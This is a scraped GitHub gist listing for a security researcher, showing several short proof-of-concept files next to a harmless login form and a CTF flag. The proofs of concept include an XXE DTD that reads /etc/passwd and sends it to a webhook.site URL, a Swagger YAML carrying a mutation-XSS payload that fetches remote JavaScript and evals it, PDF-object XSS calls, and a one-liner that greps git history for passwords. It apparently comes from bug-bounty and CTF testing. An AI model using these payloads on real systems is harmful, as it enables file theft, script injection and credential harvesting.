Skip to content

Instantly share code, notes, and snippets.

View ajdumanhug's full-sized avatar
🏠
Working from home

Aj Dumanhug ajdumanhug

🏠
Working from home
134 followers · 72 following
View GitHub Profile
@ajdumanhug
ajdumanhug / xss-poc.svg
Created December 14, 2023 08:47
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@ajdumanhug
ajdumanhug / index.html
Created September 20, 2023 18:45
Simple Login Form Animated
<div class="login">
<div class="form">
<h2>NOT WORKING YET!</h2>
<h3>Login</h3>
<input type="text" placeholder="Username">
<input type="password" placeholder="Password">
<input type="submit" value="Sign In" class="submit">
</div>
</div>
@ajdumanhug
ajdumanhug / jwks.json
Last active September 20, 2023 18:00
{
"keys": [
{
"alg": "RS256",
"x5c": [
"MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqrgOv9Czows21TmZA8UJ+B2VG4oDtCYBQ3s1y6V6v4gCAA4tnLtrQc4sUqsiJ4X78UBEV7eVnOYXgb4kuzVhuurzifI/ky6A0TekoaANxTyNLx0RucpzT23iyyix6NKCUD9o5jg7K0Lt8tBi8hOl7VomFpBcxPPI7S5BzewJS+QCJj3QQB8cgC047HRUEaJKRcPb5VPcNleGjc7caZUqtbVZETfp0OsIdPuUa0s6c8ZIrTfDrdG74HYlX8BY5rsJT39nSpFO/cDjHm2jgXbVbvmRzZ/hkasxO0q+uTKqPZVfa30leHzvCn1heuVgut9WlCxNrtjR3lmr8HKis3b5tvdUZNCyBv4OgJ0dxrBpa4SVDjnfjzCTx6krqkyRs5meOOZ5FntKT7Q700q49U/04mskamce244TbN2sP4ino26Mjfn175pq1VDU5gh+4yelfYzCUFiz+5xOqpmoAZn3xI4WzvrWwZCiLXQGTgKhwpskfKTMQ5k8ytWCR80wU1epDIYMbFGTauIVLouiQPC1xDTJA7sq/sC2Zf44+qCctO0Kc2gh77em5QmT/a7cG7D4Ct76dzTmy+04mKEMM+K1AFZGzt4GlvaRlGZ5zWsWzHw8oIimQP1Ua90aHU/uotbKLcxTzQZQ/WqXnUWgmi6LtxcCq2B+kDB380liDMt2nFkCAwEAAQ=="
]
}
]
}
@ajdumanhug
ajdumanhug / xxe.dtd
Last active February 1, 2023 17:43
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>">
%xxe;
@ajdumanhug
ajdumanhug / test.json
Created May 17, 2022 07:19
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"name": "Foo"
}
]
}
@ajdumanhug
ajdumanhug / xss.js
Created May 17, 2022 06:42
alert(/XSS by AJ/);
@ajdumanhug
ajdumanhug / test.yaml
Last active May 17, 2022 06:43
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://gist.githubusercontent.com/ajdumanhug/5026beb333226700c029b46324234e17/raw/357a217fb6499a2bce747e7d545fc84f3f77b921/xss.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
@ajdumanhug
ajdumanhug / dontmindme.json
Created October 12, 2021 14:41
none
[
{
"text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
"author": "AJ Dumanhug"
}
]
@ajdumanhug
ajdumanhug / Git Creds.md
Created May 2, 2021 17:46 — forked from int0x80/Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@ajdumanhug
ajdumanhug / pdf.txt
Created January 28, 2021 20:30
App Object for PDF
app.alert\("XSS"\);
app.response\("XSS"\);
app.launchURL\("https://example.com"\);
Other Methods:
- browseForDoc